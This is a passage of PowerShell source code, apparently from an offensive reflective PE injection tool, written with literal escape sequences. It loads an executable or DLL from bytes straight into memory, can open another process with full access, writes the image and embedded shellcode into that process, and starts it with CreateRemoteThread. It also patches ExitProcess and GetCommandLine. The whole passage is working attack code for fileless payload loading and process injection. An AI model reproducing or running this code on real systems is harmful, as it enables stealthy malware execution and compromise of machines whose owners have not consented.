$ProcExitFunctionAddrTmp\n\n\t\t\t    $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t    }\n\t\t    #################################################\n\n\t\t    Write-Output $ReturnArray\n\t    }\n\t\n\t\n\t    #This function takes an array of arrays, the inner array of format @($DestAddr, $SourceAddr, $Count)\n\t    #\tIt copies Count bytes from Source to Destination.\n\t    Function Copy-ArrayOfMemAddresses\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [Array[]]\n\t\t    $CopyInfo,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Functions,\n\t\t\n\t\t    [Parameter(Position = 2, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Constants\n\t\t    )\n\n\t\t    [UInt32]$OldProtectFlag = 0\n\t\t    foreach ($Info in $CopyInfo)\n\t\t    {\n\t\t\t    $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)\n\t\t\t    if ($Success -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw \"Call to VirtualProtect failed\"\n\t\t\t    }\n\t\t\t\n\t\t\t    $Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null\n\t\t\t\n\t\t\t    $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t    }\n\t    }\n\n\n\t    #####################################\n\t    ##########    FUNCTIONS   ###########\n\t    #####################################\n\t    Function Get-MemoryProcAddress\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [IntPtr]\n\t\t    $PEHandle,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [String]\n\t\t    $FunctionName\n\t\t    )\n\t\t\n\t\t    $Win32Types = Get-Win32Types\n\t\t    $Win32Constants = Get-Win32Constants\n\t\t    $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t\n\t\t    #Get the export table\n\t\t    if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)\n\t\t    {\n\t\t\t    return [IntPtr]::Zero\n\t\t    }\n\t\t    $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)\n\t\t    $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)\n\t\t\n\t\t    for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++)\n\t\t    {\n\t\t\t    #AddressOfNames is an array of pointers to strings of the names of the functions exported\n\t\t\t    $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))\n\t\t\t    $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32]))\n\t\t\t    $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)\n\n\t\t\t    if ($Name -ceq $FunctionName)\n\t\t\t    {\n\t\t\t\t    #AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions\n\t\t\t\t    #    which contains the offset of the function in to the DLL\n\t\t\t\t    $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))\n\t\t\t\t    $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16])\n\t\t\t\t    $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))\n\t\t\t\t    $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32])\n\t\t\t\t    return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)\n\t\t\t    }\n\t\t    }\n\t\t\n\t\t    return [IntPtr]::Zero\n\t    }\n\n\n\t    Function Invoke-MemoryLoadLibrary\n\t    {\n\t\t    Param(\n\t\t    [Parameter( Position = 0, Mandatory = $true )]\n\t\t    [Byte[]]\n\t\t    $PEBytes,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $false)]\n\t\t    [String]\n\t\t    $ExeArgs,\n\t\t\n\t\t    [Parameter(Position = 2, Mandatory = $false)]\n\t\t    [IntPtr]\n\t\t    $RemoteProcHandle\n\t\t    )\n\t\t\n\t\t    $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t\n\t\t    #Get Win32 constants and functions\n\t\t    $Win32Constants = Get-Win32Constants\n\t\t    $Win32Functions = Get-Win32Functions\n\t\t    $Win32Types = Get-Win32Types\n\t\t\n\t\t    $RemoteLoading = $false\n\t\t    if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero))\n\t\t    {\n\t\t\t    $RemoteLoading = $true\n\t\t    }\n\t\t\n\t\t    #Get basic PE information\n\t\t    Write-Verbose \"Getting basic PE information from the file\"\n\t\t    $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types\n\t\t    $OriginalImageBase = $PEInfo.OriginalImageBase\n\t\t    $NXCompatible = $true\n\t\t    if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)\n\t\t    {\n\t\t\t    Write-Warning \"PE is not compatible with DEP, might cause issues\" -WarningAction Continue\n\t\t\t    $NXCompatible = $false\n\t\t    }\n\t\t\n\t\t\n\t\t    #Verify that the PE and the current process are the same bits (32bit or 64bit)\n\t\t    $Process64Bit = $true\n\t\t    if ($RemoteLoading -eq $true)\n\t\t    {\n\t\t\t    $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n\t\t\t    $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"IsWow64Process\")\n\t\t\t    if ($Result -eq [IntPtr]::Zero)\n\t\t\t    {\n\t\t\t\t    Throw \"Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit\"\n\t\t\t    }\n\t\t\t\n\t\t\t    [Bool]$Wow64Process = $false\n\t\t\t    $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process)\n\t\t\t    if ($Success -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw \"Call to IsWow64Process failed\"\n\t\t\t    }\n\t\t\t\n\t\t\t    if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))\n\t\t\t    {\n\t\t\t\t    $Process64Bit = $false\n\t\t\t    }\n\t\t\t\n\t\t\t    #PowerShell needs to be same bit as the PE being loaded for IntPtr to work correctly\n\t\t\t    $PowerShell64Bit = $true\n\t\t\t    if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)\n\t\t\t    {\n\t\t\t\t    $PowerShell64Bit = $false\n\t\t\t    }\n\t\t\t    if ($PowerShell64Bit -ne $Process64Bit)\n\t\t\t    {\n\t\t\t\t    throw \"PowerShell must be same architecture (x86/x64) as PE being loaded and remote process\"\n\t\t\t    }\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)\n\t\t\t    {\n\t\t\t\t    $Process64Bit = $false\n\t\t\t    }\n\t\t    }\n\t\t    if ($Process64Bit -ne $PEInfo.PE64Bit)\n\t\t    {\n\t\t\t    Throw \"PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)\"\n\t\t    }\n\t\t\n\n\t\t    #Allocate memory and write the PE to memory. If the PE supports ASLR, allocate to a random memory address\n\t\t    Write-Verbose \"Allocating memory for the PE and write its headers to memory\"\n\t\t\n\t\t    [IntPtr]$LoadAddr = [IntPtr]::Zero\n\t\t    if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)\n\t\t    {\n\t\t\t    Write-Warning \"PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again\" -WarningAction Continue\n\t\t\t    [IntPtr]$LoadAddr = $OriginalImageBase\n\t\t    }\n\n\t\t    $PEHandle = [IntPtr]::Zero\t\t\t\t#This is where the PE is allocated in PowerShell\n\t\t    $EffectivePEHandle = [IntPtr]::Zero\t\t#This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process.\n\t\t    if ($RemoteLoading -eq $true)\n\t\t    {\n\t\t\t    #Allocate space in the remote process, and also allocate space in PowerShell. The PE will be setup in PowerShell and copied to the remote process when it is setup\n\t\t\t    $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t\t\n\t\t\t    #todo, error handling needs to delete this memory if an error happens along the way\n\t\t\t    $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\t    if ($EffectivePEHandle -eq [IntPtr]::Zero)\n\t\t\t    {\n\t\t\t\t    Throw \"Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use\"\n\t\t\t    }\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    if ($NXCompatible -eq $true)\n\t\t\t    {\n\t\t\t\t    $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t\t    }\n\t\t\t    else\n\t\t\t    {\n\t\t\t\t    $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\t    }\n\t\t\t    $EffectivePEHandle = $PEHandle\n\t\t    }\n\t\t\n\t\t    [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)\n\t\t    if ($PEHandle -eq [IntPtr]::Zero)\n\t\t    { \n\t\t\t    Throw \"VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free).\"\n\t\t    }\t\t\n\t\t    [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null\n\t\t\n\t\t\n\t\t    #Now that the PE is in memory, get more detailed information about it\n\t\t    Write-Verbose \"Getting detailed PE information from the headers loaded in memory\"\n\t\t    $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress\n\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle\n\t\t    Write-Verbose \"StartAddress: $PEHandle    EndAddress: $PEEndAddress\"\n\t\t\n\t\t\n\t\t    #Copy each section from the PE in to memory\n\t\t    Write-Verbose \"Copy PE sections in to memory\"\n\t\t    Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types\n\t\t\n\t\t\n\t\t    #Update the memory addresses hardcoded in to the PE based on the memory address the PE was expecting to be loaded to vs where it was actually loaded\n\t\t    Write-Verbose \"Update memory addresses based on where the PE was actually loaded in memory\"\n\t\t    Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types\n\n\t\t\n\t\t    #The PE we are in-memory loading has DLLs it needs, import those DLLs for it\n\t\t    Write-Verbose \"Import DLL's needed by the PE we are loading\"\n\t\t    if ($RemoteLoading -eq $true)\n\t\t    {\n\t\t\t    Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t    }\n\t\t\n\t\t\n\t\t    #Update the memory protection flags for all the memory just allocated\n\t\t    if ($RemoteLoading -eq $false)\n\t\t    {\n\t\t\t    if ($NXCompatible -eq $true)\n\t\t\t    {\n\t\t\t\t    Write-Verbose \"Update memory protection flags\"\n\t\t\t\t    Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types\n\t\t\t    }\n\t\t\t    else\n\t\t\t    {\n\t\t\t\t    Write-Verbose \"PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute\"\n\t\t\t    }\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    Write-Verbose \"PE being loaded in to a remote process, not adjusting memory permissions\"\n\t\t    }\n\t\t\n\t\t\n\t\t    #If remote loading, copy the DLL in to remote process memory\n\t\t    if ($RemoteLoading -eq $true)\n\t\t    {\n\t\t\t    [UInt32]$NumBytesWritten = 0\n\t\t\t    $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten)\n\t\t\t    if ($Success -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw \"Unable to write shellcode to remote process memory.\"\n\t\t\t    }\n\t\t    }\n\t\t\n\t\t\n\t\t    #Call the entry point, if this is a DLL the entrypoint is the DllMain function, if it is an EXE it is the Main function\n\t\t    if ($PEInfo.FileType -ieq \"DLL\")\n\t\t    {\n\t\t\t    if ($RemoteLoading -eq $false)\n\t\t\t    {\n\t\t\t\t    Write-Verbose \"Calling dllmain so the DLL knows it has been loaded\"\n\t\t\t\t    $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t\t\t    $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])\n\t\t\t\t    $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)\n\t\t\t\t\n\t\t\t\t    $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null\n\t\t\t    }\n\t\t\t    else\n\t\t\t    {\n\t\t\t\t    $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t\t\n\t\t\t\t    if ($PEInfo.PE64Bit -eq $true)\n\t\t\t\t    {\n\t\t\t\t\t    #Shellcode: CallDllMain.asm\n\t\t\t\t\t    $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)\n\t\t\t\t\t    $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)\n\t\t\t\t\t    $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t\t    #Shellcode: CallDllMain.asm\n\t\t\t\t\t    $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)\n\t\t\t\t\t    $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)\n\t\t\t\t\t    $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t\t\t    }\n\t\t\t\t    $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2)\n\t\t\t\t    $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n\t\t\t\t    $SCPSMemOriginal = $SCPSMem\n\t\t\t\t\n\t\t\t\t    Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem\n\t\t\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length)\n\t\t\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false)\n\t\t\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\t\t    Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem\n\t\t\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length)\n\t\t\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false)\n\t\t\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\t\t    Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem\n\t\t\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length)\n\t\t\t\t\n\t\t\t\t    $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\t\t    if ($RSCAddr -eq [IntPtr]::Zero)\n\t\t\t\t    {\n\t\t\t\t\t    Throw \"Unable to allocate memory in the remote process for shellcode\"\n\t\t\t\t    }\n\t\t\t\t\n\t\t\t\t    $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n\t\t\t\t    if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n\t\t\t\t    {\n\t\t\t\t\t    Throw \"Unable to write shellcode to remote process memory.\"\n\t\t\t\t    }\n\n\t\t\t\t    $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n\t\t\t\t    $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\t\t\t    if ($Result -ne 0)\n\t\t\t\t    {\n\t\t\t\t\t    Throw \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t\t\t    }\n\t\t\t\t\n\t\t\t\t    $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\t    }\n\t\t    }\n\t\t    elseif ($PEInfo.FileType -ieq \"EXE\")\n\t\t    {\n\t\t\t    #Overwrite GetCommandLine and ExitProcess so we can provide our own arguments to the EXE and prevent it from killing the PS process\n\t\t\t    [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)\n\t\t\t    [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00)\n\t\t\t    $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr\n\n\t\t\t    #If this is an EXE, call the entry point in a new thread. We have overwritten the ExitProcess function to instead ExitThread\n\t\t\t    #\tThis way the reflectively loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.\n\t\t\t    [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t\t    Write-Verbose \"Call EXE Main function. Address: $ExeMainPtr. Creating thread for the EXE to run in.\"\n\n\t\t\t    $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null\n\n\t\t\t    while($true)\n\t\t\t    {\n\t\t\t\t    [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0)\n\t\t\t\t    if ($ThreadDone -eq 1)\n\t\t\t\t    {\n\t\t\t\t\t    Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants\n\t\t\t\t\t    Write-Verbose \"EXE thread has completed.\"\n\t\t\t\t\t    break\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t\t    Start-Sleep -Seconds 1\n\t\t\t\t    }\n\t\t\t    }\n\t\t    }\n\t\t\n\t\t    return @($PEInfo.PEHandle, $EffectivePEHandle)\n\t    }\n\t\n\t\n\t    Function Invoke-MemoryFreeLibrary\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position=0, Mandatory=$true)]\n\t\t    [IntPtr]\n\t\t    $PEHandle\n\t\t    )\n\t\t\n\t\t    #Get Win32 constants and functions\n\t\t    $Win32Constants = Get-Win32Constants\n\t\t    $Win32Functions = Get-Win32Functions\n\t\t    $Win32Types = Get-Win32Types\n\t\t\n\t\t    $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t\n\t\t    #Call FreeLibrary for all the imports of the DLL\n\t\t    if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)\n\t\t    {\n\t\t\t    [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)\n\t\t\t\n\t\t\t    while ($true)\n\t\t\t    {\n\t\t\t\t    $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)\n\t\t\t\t\n\t\t\t\t    #If the structure is null, it signals that this is the end of the array\n\t\t\t\t    if ($ImportDescriptor.Characteristics -eq 0 `\n\t\t\t\t\t\t    -and $ImportDescriptor.FirstThunk -eq 0 `\n\t\t\t\t\t\t    -and $ImportDescriptor.ForwarderChain -eq 0 `\n\t\t\t\t\t\t    -and $ImportDescriptor.Name -eq 0 `\n\t\t\t\t\t\t    -and $ImportDescriptor.TimeDateStamp -eq 0)\n\t\t\t\t    {\n\t\t\t\t\t    Write-Verbose \"Done unloading the libraries needed by the PE\"\n\t\t\t\t\t    break\n\t\t\t\t    }\n\n\t\t\t\t    $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)))\n\t\t\t\t    $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath)\n\n\t\t\t\t    if ($ImportDllHandle -eq $null)\n\t\t\t\t    {\n\t\t\t\t\t    Write-Warning \"Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways\" -WarningAction Continue\n\t\t\t\t    }\n\t\t\t\t\n\t\t\t\t    $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)\n\t\t\t\t    if ($Success -eq $false)\n\t\t\t\t    {\n\t\t\t\t\t    Write-Warning \"Unable to free library: $ImportDllPath. Continuing anyways.\" -WarningAction Continue\n\t\t\t\t    }\n\t\t\t\t\n\t\t\t\t    $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))\n\t\t\t    }\n\t\t    }\n\t\t\n\t\t    #Call DllMain with process detach\n\t\t    Write-Verbose \"Calling dllmain so the DLL knows it is being unloaded\"\n\t\t    $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t    $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])\n\t\t    $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)\n\t\t\n\t\t    $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null\n\t\t\n\t\t\n\t\t    $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\t    if ($Success -eq $false)\n\t\t    {\n\t\t\t    Write-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n\t\t    }\n\t    }\n\n\n\t    Function Main\n\t    {\n\t\t    $Win32Functions = Get-Win32Functions\n\t\t    $Win32Types = Get-Win32Types\n\t\t    $Win32Constants =  Get-Win32Constants\n\t\t\n\t\t    $RemoteProcHandle = [IntPtr]::Zero\n\t\n\t\t    #If a remote process to inject in to is specified, get a handle to it\n\t\t    if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne \"\"))\n\t\t    {\n\t\t\t    Throw \"Can't supply a ProcId and ProcName, choose one or the other\"\n\t\t    }\n\t\t    elseif ($ProcName -ne $null -and $ProcName -ne \"\")\n\t\t    {\n\t\t\t    $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)\n\t\t\t    if ($Processes.Count -eq 0)\n\t\t\t    {\n\t\t\t\t    Throw \"Can't find process $ProcName\"\n\t\t\t    }\n\t\t\t    elseif ($Processes.Count -gt 1)\n\t\t\t    {\n\t\t\t\t    $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId\n\t\t\t\t    Write-Output $ProcInfo\n\t\t\t\t    Throw \"More than one instance of $ProcName found, please specify the process ID to inject in to.\"\n\t\t\t    }\n\t\t\t    else\n\t\t\t    {\n\t\t\t\t    $ProcId = $Processes[0].ID\n\t\t\t    }\n\t\t    }\n\t\t\n\t\t    #Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future.\n\t\t    #If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege\n    #\t\tif ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId)\n    #\t\t{\n    #\t\t\tWrite-Verbose \"Getting SeDebugPrivilege\"\n    #\t\t\tEnable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants\n    #\t\t}\t\n\t\t\n\t\t    if (($ProcId -ne $null) -and ($ProcId -ne 0))\n\t\t    {\n\t\t\t    $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)\n\t\t\t    if ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t\t    {\n\t\t\t\t    Throw \"Couldn't obtain the handle for process ID: $ProcId\"\n\t\t\t    }\n\t\t\t\n\t\t\t    Write-Verbose \"Got the handle for the remote process to inject in to\"\n\t\t    }\n\t\t\n\n\t\t    #Load the PE reflectively\n\t\t    Write-Verbose \"Calling Invoke-MemoryLoadLibrary\"\n\t\t    $PEHandle = [IntPtr]::Zero\n\t\t    if ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle\n\t\t    }\n\t\t    if ($PELoadedInfo -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    Throw \"Unable to load PE, handle returned is NULL\"\n\t\t    }\n\t\t\n\t\t    $PEHandle = $PELoadedInfo[0]\n\t\t    $RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process\n\t\t\n\t\t\n\t\t    #Check if EXE or DLL. If EXE, the entry point was 